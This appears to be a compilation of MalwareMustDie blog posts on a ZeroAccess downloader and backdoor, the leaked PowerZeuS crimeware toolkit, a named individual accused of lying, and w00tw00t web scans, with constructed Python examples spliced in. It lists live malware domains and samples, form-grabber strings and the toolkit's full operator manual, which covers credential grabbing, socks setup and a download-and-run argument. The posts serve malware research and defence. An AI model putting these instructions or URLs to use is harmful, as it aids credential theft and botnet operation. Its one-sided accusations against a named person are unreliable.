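    """Constructed minimal PE32 file (not a real sample): DOS header, COFF header,
    224-byte optional header, section table, raw section data at 0x200 alignment."""
    nsect = len(sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)    # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, nsect, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 64, claimed_checksum)
    raw_ptr = (len(dos) + 4 + len(coff) + len(opt) + 40 * nsect + 0x1FF) & ~0x1FF
    table, blobs = b"", []
    for i, (name, raw) in enumerate(sections):
        table += name.ljust(8, b"\0")
        table += struct.pack("<IIII", len(raw), 0x1000 * (i + 1), len(raw), raw_ptr)
        table += b"\0" * 16                               # relocs/linenumbers/characteristics
        blobs.append((raw_ptr, raw))
        raw_ptr += (len(raw) + 0x1FF) & ~0x1FF
    image = bytearray(dos + b"PE\0\0" + coff + opt + table)
    for ptr, raw in blobs:
        image += b"\0" * (ptr - len(image)) + raw
    return bytes(image)


if __name__ == "__main__":
    packed = bytes(range(256)) * 8                        # constructed: looks packed (8.0 bits)
    sample = build_sample_pe(0, [(b".text", packed), (b".bss", bytes(512))])
    print("\n".join(triage(sample)))
```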

What does it do? Yes, it is a downloader, an ALIVE one: it downloads WHAT LOOKS LIKE AN IMAGE FILE from dswarqryg.com

You'll see some requests like below:
..with each request session being:

..and it redirects you to download these:

PS: BLOCK THESE DOMAINS!!!
idwrlliewrwp.com/ssany.jpg
sd.newaot.com/xxswq.jpg
PoC:


Of course the purpose is to camouflage the PE file download and avoid blocking:

We can see it is actually saved in %TEMP%...

As PE binaries of ANOTHER malware file...

We also found other download URLs and saved file names in the binary:

And from reversing, it shows it targets the OS versions below:
32-bit Edition
64-bit Edition
Windows Server 2003
Windows Server 2003 R2
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 2000
Windows XP

ZeroAccess "Accompanied" Trojan "B" - the Backdoor as a Service: "SpringSvc.exe"

Well, the downloaded binary is saved in the %WINDOWS% directory, with the VT details below:

   URL: https://www.virustotal.com/en/file/0ddb20210558a5d95aa90ebbda3c666b46321af1c70319ce8aebbc1dfcfd754e/analysis/
SHA256:0ddb20210558a5d95aa90ebbda3c666b46321af1c70319ce8aebbc1dfcfd754e
SHA1: 6388534e59b78f1d68165ab454f3f5bfd3803fde
MD5: 9b34ca74c08a890af5b9f692d68516c3
File size: 354.0 KB ( 362496 bytes )
File name: SpringSvc.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 23 / 48
Analysis date: 2013-10-07 11:27:28 UTC ( 2 minutes ago )
--------------------------------------------------------------------------
Antivirus Result Update
--------------------------------------------------------------------------
Bkav HW32.CDB.B3ff 20131007
MicroWorld-eScan Gen:Trojan.Heur.FU.wS0@aKIipfmj 20131007
CAT-QuickHeal (Suspicious) - DNAScan 20131007
McAfee Artemis!9B34CA74C08A 20131007
Malwarebytes Trojan.Agent.EDC 20131007
K7AntiVirus Trojan 20131004
K7GW Trojan 20131004
Symantec WS.Reputation.1 20131007
TrendMicro-HouseCall TROJ_GEN.R0CBH07J613 20131007
Kaspersky Trojan.Win32.Agent.acbkp 20131007
BitDefender Gen:Trojan.Heur.FU.wS0@aKIipfmj 20131007
Agnitum Suspicious!SA 20131006
Sophos Mal/Generic-S 20131007
F-Secure Gen:Trojan.Heur.FU.wS0@aKIipfmj 20131007
AntiVir TR/Spy.362496.35 20131007
McAfee-GW-Edition Heuristic.LooksLike.Win32.SuspiciousPE.C 20131007
Emsisoft Gen:Trojan.Heur.FU.wS0@aKIipfmj (B) 20131007
Panda Suspicious file 20131007
GData Gen:Trojan.Heur.FU.wS0@aKIipfmj 20131007
AhnLab-V3 Trojan/Win32.Agent 20131007
ESET-NOD32 a variant of Win32/Spy.Wagiclas.AC 20131007
Fortinet W32/Agent.ACBKP!tr 20131007
AVG PSW.Generic12.AYU 20131007
..and the binary was compiled with a Borland-based builder/SDK:
FastMM Borland Edition 
2004, 2005 Pierre le Riche / Professional Software Development
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
Software\Borland\Delphi\Locales

OK.. OK..OK, got it! But WHAT does it do??

This downloaded file is executed by the previous downloader:

And it does process injection, then resides as a service:
PoC of the service calls from reversing:

StartServiceA
StartServiceCtrlDispatcherA
CreateServiceA
Then this SpringSvc.exe contacts its mothership at kdsousom.com / 67.198.168 .115, poking for a "package":

And a grabber:

<form
name="
name=
type="hidden"
type=hidden
<input
value=
/select>
/textarea>
</form
Elements
Item
Forms
Length
tagName
INPUT
type
text
Name
Value
...of the phishing credential data:
NAME
FIRST
title
LAST
PHONE
ZIP
MAIL
BIRTH
YYYY
yyyy
password
checkbox
checked
radio
checked
checked
TEXTAREA
call me,Thank you.
not sure
SELECT
sex
options
length
text
selectedindex
onchange
value
selectedindex
SUBMIT
SEARCH
Value
LOGIN
SIGN IN
submit
Click

Yes, it is a backdoor requesting and passing credentials, and we're sure there's nothing good in it..

Epilogue

Friends, my point is simple: ZeroAccess is out there, still lurking at us.
These samples and this network are fresh and new.. this post is a PoC of the existence of ZeroAccess in the wild.
All of the bad domains mentioned are exposed as targets to be shut down.
I will share the samples shortly, after sorting things out. Stay secure!

Additional

Samples Download

We share the samples and the malicious botnet traffic, with the trojan callback traffic, for raising the detection ratio and for research purposes only, to known researchers.
I will ask many questions before sharing the samples above with anyone not matching the described criteria.
Here are the downloads; click the picture to access:

Samples/PE Binaries

(password needed - ask by DM to @malwaremustdie in twitter)

Traffic in PCAP:

(no password)

#MalwareMustDie!


KINS? No! PowerZeuS, yes! Source Code for View & Download


Background

It was finally announced publicly in social media TODAY that the leaked source code of (updated) what we thought was KINS (/updated) was publicly exposed. We found out later, in the code, that there is no link to any currently alive CnC with the destination and/or pattern used by the known "real KINS", apart from some differences inside the binary files. And (with thanks to "Invisible Kid" for the suggestion to clarify this matter) we found this toolkit is built on the known toolkit PowerLoader with an optional/additional ZeuS module/functions in DLL shape (actually indicated to be stripped Citadel code); therefore, ad hoc, "PowerZeus" looks like the suitable name for this malware/toolkit.

Peeling the code deeper, we found bootkit code from Carberp used; the loader leaves old SpyEye traces (don't ask me why..); the form-grabber comes from the ZeuS-based root (found in Citadel too); the gate web interface used is similar to what Pony/Zbot used, with altogether tons of flaws in it.. it made me feel like seeing a reunion of the ZeuS family in one package. Our coder team also noticed that at least three different PHP coders were working on separate modules at separate times for the gate's code.

Below are simple grep traces, as PoC, of builder code snippets that show the modules built by the toolkit (cf. PowerLoader):

make.py(262): def build_project(project, project_out, params, is_x64 = False):
make.py(384): build_project('softwaregrabber','softwaregrabber.dll', params)
make.py(402): build_project('socks_server','socks5Server32.dll', params)
make.py(420): build_project('socks_server','socks5Server64.dll', params, True)
make.py(438): build_project('mod-killer','mod-killer.dll', params)
make.py(456): build_project('dropper','dropper32.exe', params)
make.py(474): build_project('dropper','dropper64.exe', params, True)
make.py(492): build_project('clientdll','client32.dll', params)
make.py(510): build_project('clientdll','client64.dll', params, True)
make.py(542): build_project('builder', outfile, params)

I had just finished reading all the code when I added this note; it is a must-have for the AV industry and researchers to understand the recent concept of form-grabber, the bot networking used, the bootkit, the gate's code and its vulnerabilities (I count 3 SQLi, 2 PHP/escape flaws & 1 user privilege escalation exploit in the gate's code, which can be used to, erm, "mitigate" this threat *smile*).

Many download sources were announced; some contain PUPs with unnecessary backdoors which can actually infect you. So I feel it is important to have a clean download for AV filtration support and research purposes. If I may add, for the press and media gentlemen: this malware is not news, but the public disclosure of this toolkit's code is.

Malware Product Description (in package)

Below I pasted, as-is, the malware (toolkit)'s product description found in the source code. Please take a good look at this description, especially at the explanation of mod-killer, the socks module, the softwaregrabber module (designed for grabbing FTP, email, pop3 data and certificates, integrated with a common "neural network" and bound as a bot base module to the kernel) and the installation parts. The password for the exported admin certificates is also written clearly in plain text:

Product description:
itur1, url2, url3 - URLs on the gate dropper ( exe file).

In addition , there are two main slashes spare in case if your domain loknut .
This file should be progruzhat . It must be crypted .

delay - the delay otstuk

retry - interval core sampling bot.

buildid - the name dropper botnet .

encryption_key - encryption key.

url_server - admin Gate "B" , that is, admin core.

$ - Notifay .
! - A ban .
@ - Screenshots ( full-size ) .

macros :
% BOTID% - ID bot.
% opensocks% - automatic opening of the socks in the transition to H HRM .

captcha_server - interception of CAPTCHA . Works with AD. Leave as is.

After collecting the config files is issued shall be issued 3 - dropper.exe,
bot32.dll, bot64.dll and just as you do is file softwaregrabber.dll,
which has already been assembled independently of the first three .

dropper.exe - dropper file ( 50 kb ), which pulls the core bot (2 cores , bot32.dll
and bot64.dll). This file is crypted .

bot32.dll - kernel for 32-bit systems .....
: > kriptovat is not necessary . Avtokript memory . The modules are the basis of
the bot and are responsible for the processes of injection and grabbing a browser .
bot64.dll - kernel for 64 -bit systems .....

softwaregrabber.dll - module port opening . Responsible for grabbing FTP \ Email \
pop3 \ Billing \ screen and check otstuk kernel modules. Kriptovat is not
necessary . Avtokript memory .

The core of the bot. RULE OF COMMUNICATIONS AND DOWNLOADS . Pay special attention .

- Adding a file in the " Files" section. As jobs are added files bot32.dll,
bot64.dll, softwaregrabber.dll and other modules , including third-party dll or exe files .
Name and version selected as desired. Bot communicates with the modules Zutick,
Shylock, SpyEye, but without an open API ( optional) argument to leave empty.
Attention ! Communication with the module . First, load the kernel modules .
In this case, the kernel modules should not be linked to anything .
Next, load the module softwaregrabber.dll,
that should be associated with bot32.dll

- Give the job to the modules in the " job ." It should be noted key points :
a) To select the kernel module loading mode " reusable "
Module softwaregrabber - " one-off " or " reusable " .
b) Number of times (performance ) put a big number, eg 9999999 .

- Quest " written in the config ", " input commands manually " are available on
ly when you open API. Setting the "send logs " is available only for debug version,
which is done by request and in extreme cases. In this case, the installation
logs dropper and obtaining rights go to the " logs " .

- Net \ dirty - a necessary attribute if you decide to download the bots in one hand.

- Updating the dll is on the circuit i +1 preserving the bot name in the files
and assignments , if necessary update of sequence, and the scheme i, if the update
comes after the reboot .

- To update the statistics in the admin dropper , do not forget to add the task to CZK .

- The difference between the admin area "A" and "B" indicates the quality of
your traffic. Cores bot ticking only after obtaining logs . In case
progruzhaetya kernel , say, Dedic , where there is no activity , the bot will
appear in the admin "B" , but did not appear in the admin area "A".
You can always see the number of loaded cores bot in the " jobs " in the admin
dropper . The difference in bad trafe may reach 90 %
we only show the balance of objective things.

The module mod-killer is designed to maintain the purity of your bots from
third-party bots , unwanted software .
- Deleting Citadel (all), Zeus (all), SpyEye (all), IceIX (all),
Evolution (all) and their derivatives , Carberp ( exception - bootkit )
Zutick, Lickat, Shylock, Gazavat (Sality).
- Delete a third-party malicious software, such as loaders , Rata , DDoS bots , based on heuristic analysis.
- Removal of unwanted software, such as click bots , bots spoofing issue , based on the heuristic analysis.
- Removal of the common bots even crypted form on the basis of signatures.
- Total integration with neural network bot. Analysis of unsigned software , processes, without windows, etc.

Installation Options :
Specify the arguments (arguments SpyEye in the admin core)
"77_uninstall;" - the removal of unwanted software , such as a boat- clickers , etc.
"77_replace_with = http://aa.ru/file.exe" ( if you have the software to progruz ,
but competitors will ship similar software on your bot ) swings on a new boat
with RLS imunnitetom to deliteru - 77_uninstall
"Report;" - bug report in the admin area of the nucleus.
"Clean_zeus_based;" - delete all versions of popular signature-based bots .
The record of a line of several arguments. Each argument must end with "" .
Load module files , add to the value associated with the core bot32.dll

In order to use the module socks , do the transaction :
1 ) Find a server, it is desirable to Windows ( you can Dedicated Server with
installed apache / nginx / xamp / denwer, in general, need a server
with installed php). Nix on Vine also supposed to work .
2) Fill socks_server folder on the server , we put all the 777 law.
3) Take gate.php link to the file on the server, remember .
4 ) Go to the admin panel dropper , add -ins and socks5Server32.dll socks5Server64.dll,
in the arguments indicate the link from paragraph 3 ) .
Where to inject - explorer.exe.
5 ) Sox as IP: Port take in going to the link " your_server " / control.php, either from the log.txt
Sometimes we clean konnekshn we click in Kill Tasks. The terminal supports the
socks fourth and fifth versions of standard rfc.
Authorization is not required. Volnovatsya about ports for bots do not need ,
they will take out of the gate .

WARNING ! The module must be connected to the core bot32.dll for socks5Server32.dll
and bot64.dll c socks5Server64.dll respectively.
Attention ! In the tasks and files names must be exactly socks5Server32.dll and socks5Server64.dll
Auto open socks carried out on the macro / /% opensocks% in inzhekta .

The module is designed for grabbing softwaregrabber FTP , email , pop3 data and certificates.
The module is integrated with a common neural network is bot base module to the kernel .

Installation Options :
Specify the arguments (arguments SpyEye in the admin core)
"Grab_all;" - Rob everything - all FTP data that are recorded by a list of
all email-i + contacts uchetka ,
Cookies IE and FF ( after sending the admin area as possible are removed ) ,
and certificates MY store ( exported to the admin certificates under the password "GCert")
"Grab_emails;" - grabbing only the email adresses .
"Grab_ftps;" - grabbing only FTP .
"Grab_certs;" - grabbing only certificates.
"Grab_sol;" - salt- grabbing cookies .
The record of a line of several arguments. Each argument must end with "" .
Load module files , add to the value associated with the core bot32.dll

Code Sharing Details

I wrapped up all of the code into a 7zip after confirming its authenticity, so it is available as a clean share; you can download it safely from here -->[MalwareMustDie MediaFire]
This source code is very important for filtering the several evasion techniques used by similar variants, and also for planning a mitigation for the malware's bootkit implementation. I really hope the AV industry will use this code well in their products' implementation.

Before you download, please check the size, MD5 hash, date and filename as shown in the movie below. In addition, there are countries that forbid possession of malware source code, so if you want to view what's in the source code package without downloading it, you can see it in the movie below, which I just took to give an idea of what the source actually contains:

The share limitation and rules

The password will be shared with known security researchers and the anti-virus industry ONLY; please contact us by a mention on twitter, or by email if you already know how to reach me. We share this information to raise the detection ratio of the threat and for mitigation purposes. Any other purpose (even if it sounds legitimate) will be rejected without notification or put into lower priority. This is recent and dangerous malware code, evil malicious source code, a cyber crime tool; our sharing method in this subject is not a democracy nor a discussion, please understand. So please present yourself, your work and your purpose well.

Thank you for the good Crusader that leaked the source directly to us. God bless you.

References:

1. Technical Overview (Bootkit+Evade Wow64): KINS Source Code Leaked (Touch My Malware), link-->HERE
2. In depth analysis: Having a look on the KINS Toolkit (Xylibox), link-->HERE
3. Article: New Trojan #INTH3WILD: Is Cybercrime Ready to Crown a New “KINS”? (RSA Blog), link-->HERE

Kudoz friends in arms who read codez!

Luv you all! Stay secure! ( ^-^)v

The password is a tribute to a good young friend crusader with a very big heart!

#MalwareMustDie!

Intelligence report. Beware: Trojan7sec, A wolf in sheep's skin

In reversing malware we have to deal with code and its behavior, thinking backwards, connecting logic on the collected data to figure out how the malicious scheme works. This case is rather unusual: we reverse a social-engineering malicious act, which is far more complicated than reversing malware code. The concept is the same, but instead of code we need to deal with facts, tracing one fact to another to find the real malicious concept behind it. The big difference between these two kinds of reversing is that dealing with malware code is easier, since code itself never lies (yes, there are some manipulations or tricks, but it is all readable), while the malicious actor behind social engineering does. Here are the details:

The Internet is a medium designed by UNIX engineer gentlemen with the good hope and heart of making it easier for people to communicate with each other around the globe. So some people think they can lie online, by faking personalities, pretending to be good while actually doing bad things behind the scenes. These people may think "who knows?"
In malware fighting, to counter cyber crime, it is important to cook our intelligence well, and we in #MalwareMustDie are good at nailing these liar/impostor cases. This is one disclosure of such a case.

For the purpose of this investigation we pretended to accept the subject for close intelligence activities; that project is done now. Herewith we announce and clarify that the subject does NOT have anything to do with #MalwareMustDie.

Trojan7sec

A lot of you have probably noticed a so-called "security researcher" claiming to be an "ex-blackhat" with quite an impressive skillset and background. For those who have not read his post about his background, here is a link and here is a mirror of the post in case it is taken down. There is also a second post about himself, link here and mirror here. We will be debunking these posts so the people who have fallen for his stories can tell the facts from fiction.

Breaking it down


This is probably the most obvious lie to anyone with any security background at all. This claim has many holes, I will go through each.

Botnet Estimates vs Actual
Botmasters usually have a fairly accurate way to determine the number of bots, usually via unique ids that are assigned to each computer on infection. Because security experts very rarely gain access to the botnet command and control panel, the estimated number of bots is mostly calculated by monitoring the C&C servers and logging the unique IPs over the course of a month. If you understand IPv4, you'll know that there are far fewer IPv4 addresses than there are computers; to cope with this, ISPs use a method called "IP pooling", which simply means that instead of assigning each client a permanent IP address, the ISP maintains a collection of IPs that are assigned on the fly (when a client logs on to the internet, they are given an IP at random). Because so many ISPs use IP pooling, over the course of a month far more IPs are logged than there are infected computers, so the total number of estimated infections ends up far higher than the actual.
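The over-counting described above is easy to reproduce. The toy simulation below is an added example, not part of the original post: a constructed population of bots checks in daily, each bot sometimes receives a fresh address from a constructed ISP pool, and the naive "distinct IPs over a month" figure is compared with what the botmaster's panel would count (distinct per-infection ids). The daily-peak estimator is a commonly used correction added here for contrast; all sizes and probabilities are made up for illustration.

```python
"""Added example (not from the original post): a toy simulation of why
counting distinct IP addresses at a sinkhole or C&C monitor overestimates
a botnet when ISPs assign addresses from a shared pool.

All numbers below are constructed for illustration; nothing here is
measured from a real botnet."""
import random


def simulate_sightings(n_bots, pool_size, days, reassign_prob, seed=1):
    """Return a list of (day, bot_id, ip) check-ins.

    Every bot checks in once per day.  With probability `reassign_prob`
    a bot has been handed a different address from the ISP pool since its
    last check-in (the "IP pooling" effect), so the same infection shows
    up under a new IP.  `bot_id` plays the role of the unique id the bot
    generated on infection and reports to its botmaster."""
    rng = random.Random(seed)
    current_ip = {bot: rng.randrange(pool_size) for bot in range(n_bots)}
    sightings = []
    for day in range(days):
        for bot in range(n_bots):
            if day > 0 and rng.random() < reassign_prob:
                current_ip[bot] = rng.randrange(pool_size)
            sightings.append((day, bot, current_ip[bot]))
    return sightings


def estimate_by_unique_ips(sightings):
    """The naive outside estimate: distinct IPs seen over the whole window."""
    return len({ip for _, _, ip in sightings})


def estimate_by_daily_peak(sightings):
    """A tighter outside estimate (a common correction, added here): the
    largest number of distinct IPs seen on any single day.  A bot holds
    one address at a time, so a day's distinct IPs cannot exceed the
    number of bots active that day."""
    per_day = {}
    for day, _, ip in sightings:
        per_day.setdefault(day, set()).add(ip)
    return max(len(ips) for ips in per_day.values())


def count_by_bot_id(sightings):
    """What the botmaster's panel counts: distinct per-infection ids."""
    return len({bot for _, bot, _ in sightings})


def compare(n_bots=1000, pool_size=1_000_000, days=30, reassign_prob=0.3):
    """Run one constructed scenario and return the three figures side by side."""
    s = simulate_sightings(n_bots, pool_size, days, reassign_prob)
    return {
        "actual_bots": count_by_bot_id(s),
        "monthly_unique_ips": estimate_by_unique_ips(s),
        "daily_peak_ips": estimate_by_daily_peak(s),
    }


if __name__ == "__main__":
    for name, value in compare().items():
        print(f"{name:>20}: {value}")
```

With 1000 bots and a 30% chance per day of a pool reassignment, the monthly unique-IP figure comes out several times larger than the real population, while the daily peak stays at or just below it; the gap grows with the reassignment rate and the length of the observation window.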

Large Botnets That Fit The Description
Bearing in mind that botnet estimates are usually way over, the biggest botnet ever is thought to be Conficker with an estimated 10 - 15 million infections. Conficker did not produce much spam compared to some much smaller botnets, and it was not involved in banking fraud, keylogging or form-grabbing, so Conficker is off the table. Now we are not going to bore you by going through every single botnet and showing you how it doesn't fit that claim, so we'll cut to the chase: no recorded botnet over 1 million bots fits all those characteristics.

Stating The Obvious
There is zero chance that a botnet of that size would go unnoticed, never mind one of the people involved then giving up and going to twitter to talk about it, the fact he owns a gym and what country he lives in (people have gone to jail for far smaller mistakes). We'd also like to state that no one with a botnet of that size would bother with DDoS: the money made from launching denial of service attacks wouldn't even amount to 0.1% of the potential botnet revenue, and it would draw unnecessary attention.


At a first glance this is probably believable to even people with a security background, although we cannot fully disprove this, we can state why it is highly unlikely.

Malware Marketplace
Nearly all of the high-level malware marketplaces are Russian-speaking only. Trojan7Sec lives in England and does not speak any Russian, which limits him to English-speaking forums (we could count the number of banking trojans sold on English forums on one finger). Of course he could have someone Russian-speaking sell the product for him, but it's very unlikely.

Quality of Code
We'd estimate the average price of a professional bot with the said features at about $2k - $5k; 10k would be a push and would likely come from a very advanced programmer. Here is some code Trojan7sec posted on his blog a month after he wrote the above post: Link, Mirror. This code is very beginner-level and low quality; it is not the code you'd expect from someone who can code an HTML inject at all, never mind an expensive piece of malware.

Firstly you'll notice there is no error checking whatsoever, if any of the GetModuleHandle or GetProcAddress calls were to fail, the code would crash the browser on injection.
Secondly you'll notice this "while(Process32Next(handle, &ProcessInfo))", there is no call to Process32First which is generally what anyone with any programming background would do.
Lastly he doesn't close the thread handle, or the snapshot handle. It's hardly the end of the world, but it's something any competent programmer would know to do.

There's also the non-standard and over-the-top use of the #define directive, as well as the unnecessary use of strcpy on data that could have been initialized at compile time. This is not the code you'd see from a professional malware coder selling code for $10k - $20k; this is the code you'd see from a member of hackforums selling a $100 bot.


This is probably the only true statement. It's clear Trojan7Sec is a pathological liar, however "believable" may be a slight overstatement (saying that, some of his stories did make it to big news sites).


Again, more of the same. This time the number is rounded up to an even more unlikely 20 million; we also learn that his botnets use tor, msn and peer to peer to communicate. If you remember recent news, a botnet of around 400k computers started using tor and was the talk of the internet. Not only would a botnet of the size being talked about here be noticed, it would likely grind the entire tor network to a halt. It is agreed upon by a lot of researchers that peer-to-peer botnets are the most complex to develop, not the sort of thing you'd expect from someone who only knows C++ at an entry level. It is also important to add that using IM services like MSN to control bots is ridiculous; the concept is limited to very small botnets and malware usually written by script-kiddies.

/r/netsec

If we do some digging on Trojan7sec, we can find a post on the netsec subreddit that he authored. Although it was deleted due to the large amount of lies, we can find the original comments here. The post is in the form of an IAMA (this means "I Am A ... Ask Me Anything"). Sadly, this post made it to news sites such as softpedia and welivesecurity, drawing attention away from the real problem.


(Note - If anyone can find a mirror of the full post, please leave a comment with the link or email us)

UPDATE: The REDDIT post was restored and is accessible now:

Inspiration

The first thing we noticed is the similarity between the original post and this one; it is likely that Trojan7Sec got his inspiration for the "AMA" from the one written by the skynet botnet developer over a year ago. It's also interesting to note that if you look at the post date, despite being posted around the same time as the blog post, there is a 12 million difference in the alleged number of bots.

Debunking The Comments

Just in case anyone doubts this is Trojan7sec's reddit post


This is interesting, anyone who works in the malware research industry knows that java malware is notoriously easy to detect. Not only has there never been any record of such a large botnet using java, it's a well known fact that there are not enough targetable OS X and Linux computers running java for it to be worth the loss of windows infections. This is the reason that pretty much all big botnets use native windows executables and are not cross-platform. 

Java malware is only really used by professional botmasters for targeting android devices. If you were to visit a beginner-oriented hacking forum, such as hackforums, you would notice an abundance of java malware. This is due to java appealing to script-kiddies because it is easier to write malware with; it is also more suited to beginner botmasters because java applications are usually ignored by antiviruses (this would be helpful to someone with little knowledge of advanced rootkit or antivirus evasion techniques).



This is the sort of thing someone pretending to be a mastermind cybercriminal would say; making 15-20k per hour does not get you out of jail, and if someone with Trojan7sec's alleged track record was arrested, it would likely result in the rest of his life in jail. We'll just throw it out there: 20k in 1 hour is a potential 175 million a year. It's up to you whether you believe this person had that much earning potential, then gave it all up to sit on twitter insulting security researchers.



After consulting with many people, blackhat and whitehat, we can conclude that no such board exists. Some private boards (nearly always Russian-speaking ones) do implement a signup fee of $50 - $1000; this fee is to deter low-level law enforcement and security researchers who do not want to pay money to profile a forum. $20,000 is a lot of money, more than some people make in a year; a fee so large would deter just about everyone except very rich cybercriminals, which would of course make the forum a prime target for the FBI (who do have $20,000 to spend on a forum account).

We also mentioned earlier that Trojan7Sec is English, the most exclusive English hacking forum is darkode, which is so easy to get into that the forum user-base has more security researchers than legitimate members.


Further, regarding what the subject explained in this post: the person arrested in Israel and asked to help defend against cybercrime was Hamza Bendelladj, a botmaster and seller for spyspreader known online as BX1. Hamza was not the Zeus coder and had nothing to do with Zeus (other than using it). Anyone who had access to any private forums would know this fact; only script-kiddie oriented forums such as hackforums were spreading rumors that said otherwise. Furthermore, the real story of BX1 is actually as described below:

Deleted Tweets of Trojan7Sec

These are some now-deleted tweets of Trojan7sec talking about the bot he spent 4 and a half years coding. Here is a list of features; you'll notice some features, such as polymorphic encryption and bootkit, that he is certainly not capable of coding and which are likely taken from the carberp leak.

0-Days

Looking at trojan7sec's twitter, blog and reddit, we see the word "0-day" thrown around constantly. Contrary to popular belief, zero-day exploits are incredibly rare on the blackhat scene. Even advanced malware such as TDL and Rovnix use patched exploits. Especially with the rise of bug bounty programs, if any malware were to use a 0-day exploit, it would be reported as soon as it was seen. 0-day exploits take a great amount of work and are patched very quickly; professional malware developers soon realized that using recently patched exploits was more effective (very few people update software regularly).

"0-Day" is a word that wannabe black-hats throw around to get attention, anyone with little knowledge of how the black-market works would think that 0-day exploits are far more common that they actually are, leading to the constant use of the term.

How and Why

A lot of you are probably wondering why we did this. It's simple: people like Trojan7Sec who make up stories then "become whitehat" draw attention away from the real issue. There are people working day and night doing their best to prevent and destroy malware; they get very little recognition and not a lot of pay. Along comes someone with what looks like a lot of experience and an impressive background story, who then sits on twitter insulting hard-working security researchers and antivirus companies, as well as feeding false and misleading information to amateur researchers who have been drawn into their web of lies. We have enough evidence to believe that Trojan7sec is very much still a blackhat and is likely only pretending to be whitehat for publicity.

While writing this article we have consulted with researchers, blackhats, and programmers in order to make sure everything we say is as accurate as possible. For those of you who are actually whitehat, keep up the good work and remember:

"Thou Shalt Not Lie.. When the truth reveals, it will hurt you!"

Additional:


#MalwareMustDie. 

A Disclosure of What's Behind the #w00tw00t Attack


Background..

Not so long ago I received this attack on our web server:

That was actually the first of a series of attacks we received, as listed here-->PASTEBIN
Having had enough, I started to investigate this matter thoroughly. With the help of @malm0u53 I was led to the source of the attack, and started digging deeper over there to find stuff malicious enough to shock a good person.

This report contains many ways to mitigate similar attacks in the future, and also helps in understanding the source and nature of the current threat. For Firewall/IPS/IDS filtration research, maybe this poor English writing can be used as a reference. I will share the samples when ready; they contain very dangerous tool-kits & packages.
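For the filtration side just mentioned, the simplest useful control is to spot the scanner's probe in the web server's own access log and feed repeat sources to the firewall. The script below is an added example, not from the original post: it parses Apache "combined" format lines, flags request paths that carry the w00tw00t marker this post is named after, counts probes per source IP and renders DROP rules for the sources that cross a threshold. The log lines, timestamps and IP addresses are constructed for this example (documentation ranges 203.0.113.0/24 and 198.51.100.0/24); the two probe paths are the commonly seen DFind and ZmEu forms of the marker.

```python
"""Added example (not from the original post): flag w00tw00t-style
vulnerability-scan requests in an Apache/nginx combined access log and
turn repeat offenders into a firewall block list.

The log lines and IP addresses below are constructed for this example
(documentation ranges 203.0.113.0/24 and 198.51.100.0/24)."""
import re
from collections import defaultdict

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Substrings that identify the scanner's probe.  The w00tw00t marker is the
# one this post is about; extend the tuple from your own logs as needed.
SCAN_MARKERS = ("w00tw00t",)

# Constructed sample log: two scanning sources, one normal visitor, one junk line.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Oct/2013:21:23:03 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
198.51.100.21 - - [20/Oct/2013:21:23:05 +0900] "GET /index.html HTTP/1.1" 200 2518 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Oct/2013:21:24:11 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 400 226 "-" "-"
198.51.100.9 - - [20/Oct/2013:22:16:47 +0900] "GET /W00TW00T.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
malformed line that should be skipped
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if unparseable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_scan_request(path):
    """True if the request path carries a known scanner marker (case-insensitive)."""
    lowered = path.lower()
    return any(marker in lowered for marker in SCAN_MARKERS)


def scan_hits(log_text):
    """Map source IP -> number of scanner probes seen from it."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_scan_request(rec["path"]):
            hits[rec["ip"]] += 1
    return dict(hits)


def block_list(log_text, threshold=2):
    """IPs that sent at least `threshold` probes, sorted for stable output."""
    return sorted(ip for ip, n in scan_hits(log_text).items() if n >= threshold)


def iptables_rules(ips):
    """Render DROP rules; review them before applying to a live firewall."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in ips]


if __name__ == "__main__":
    print(scan_hits(SAMPLE_LOG))
    for rule in iptables_rules(block_list(SAMPLE_LOG)):
        print(rule)
```

The threshold matters: a single probe is enough to log and alert on, but automatic blocking on one hit will also catch researchers and vulnerability scanners you asked for, so the block list here only takes sources that repeat. The same marker match can be dropped into a fail2ban filter or an IDS rule, since the probe path is sent in clear text and never changes between hosts.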
Following is the report in detail..

Tracking..

First I made classification of the IP addresses:

118.26.203.66
211.162.16.164
58.211.18.184
197.221.26.250
2.228.117.30
46.105.124.119
212.227.251.6
Looking at the details of each IP, to prioritize the examination:
DATE                        | IP           | REVERSE                         | ASN  | NETWORK PREFIX  | AS CODE         | cn | ISP CODE            | ISP NAME
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Sun Oct 20 22:18:15 JST 2013|118.26.203.66 | - |23724 | 118.26.200.0/21 | CHINANET-IDC-BJ | CN | - | FOREST ETERNAL COMMUNICATION TECH. CO.LTD
Sun Oct 20 22:16:47 JST 2013|211.162.16.164| - |4837 | 211.162.16.0/20 | CHINA169 | CN | SZGWBN.NET | BEIJING GUOXIN BILIN TELECOM TECHNOLOGY CO. LTD
Sun Oct 20 21:23:04 JST 2013|58.211.18.184 | - |23650 | 58.211.16.0/21 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
Sun Oct 20 21:23:03 JST 2013|197.221.26.250| - |37153 | 197.221.0.0/18 | HETZNE | ZA | YOUR-SERVER.CO.ZA | HETZNER (PTY) LTD
